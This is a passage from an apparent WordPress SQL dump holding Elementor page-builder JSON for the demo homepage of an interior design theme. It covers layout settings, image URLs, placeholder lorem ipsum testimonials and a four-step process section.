hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(2973,4734,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(2974,4734,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:2;s:7:\"ovaicon\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2975,4735,'_wp_page_template','elementor_header_footer'),(2976,4735,'_elementor_edit_mode','builder'),(2977,4735,'_elementor_template_type','wp-page'),(2978,4735,'_elementor_version','3.6.6'),(2979,4735,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\